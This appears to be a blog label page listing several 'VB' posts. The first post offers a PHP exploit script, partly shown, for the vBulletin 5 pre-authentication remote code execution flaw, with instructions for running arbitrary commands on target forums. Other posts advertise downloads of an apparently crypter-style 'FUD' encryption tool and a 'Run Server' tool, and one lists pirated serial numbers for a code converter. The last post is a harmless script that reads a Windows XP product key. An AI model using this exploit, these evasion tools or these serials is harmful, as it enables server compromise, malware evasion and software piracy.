Posts

Showing posts with the label vb

VB 5 preauth RCE Remote code execution exploit

Image
VB 5 preauth RCE Remote code execution exploit Pranaam to all _/_ this script exploit preauth RCE vulnerability in VBulletin 5 version (POC published by Cutz) script is developed by someone else just type target forum link and in command box type whatever command you want to execute, syntax is system(your_command); like ls so type system(ls); if you want to execute whoami command type system(whoami); Enjoy source code is //////////code starts <?php /* Greetxx to Gujjar pcp :: Rummy khan :: ConnectingFriend :: Haxorious Mind :: Exploiter-z :: Ch3rn0by1 :: zen :: zeshi :: Makman */ if (isset($_POST[target])) { $host = $_POST[target];  $path = /ajax/api/hook/decodeArguments?arguments=; class vB_Database { public $functions = array(); public function __construct() { $this->functions[free_result] = assert; } } class vB_dB_Result { protected $db; protected $recordset; public function __construct() { if(isset($_POST[command])) { $command = $_POST[command]; } else if (isset($_POST[sh...

VB Net Run Server In Pastebin Base64 By I M 9

Image
VB Net Run Server In Pastebin Base64 By I M 9 � Informa��es: � VB.Net: Run Server In [Pastebin / Base64] � Tamanho: 132 KB ::. � Data da Cria��o: 21/02/2017 [00:41] download  file  now

VB Net to C Sharp Converter v2 31

VB Net to C Sharp Converter v2 31 Serial Number : P22Q5-AH263-MG000-6F5NB-33475 Serial Number : P7T7Q-J0227-4IG10-514K4-42D27 download  file  now

VB Net Encryption FUD v2 By Dark w3b

Image
VB Net Encryption FUD v2 By Dark w3b � Informa��es: � VB.Net: Encryption FUD v2 By Dark_w3b � Tamanho: 629 Bytes ::. � Data da Cria��o: 09/01/2017 [08:33] download  file  now

VB Script to Know Windows XP Product Key

VB Script to Know Windows XP Product Key If you ever loose your Windows XP Product Key (CD Key or Serial Key), you can find it through registry. But the value will be encoded, so following code will find the key in registry and decodes it and shows it in a message box. This way you can get back your Serial Key. Create a Notepad file with title "ProductKey.vbs" and write the following code into it and save the file. If you double click the file, it will show the product key. ****************************************************** Set WshShell = CreateObject("WScript.Shell") MsgBox ConvertToKey(WshShell.RegRead("HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionDigitalProductId")) Function ConvertToKey(Key) Const KeyOffset =52 i = 28 Chars="BCDFGHJKMPQRTVWXY2346789" Do Cur = 0 x = 14 Do Cur=Cur*256 Cur=Key(x+KeyOffset)+Cur Key(x+KeyOffset)=(Cur24) And 255 Cur= Cur Mod 24 x=x-1 Loop While x>=0 i=i-1 KeyOutput = Mid(Chars,Cur+1,1) & Ke...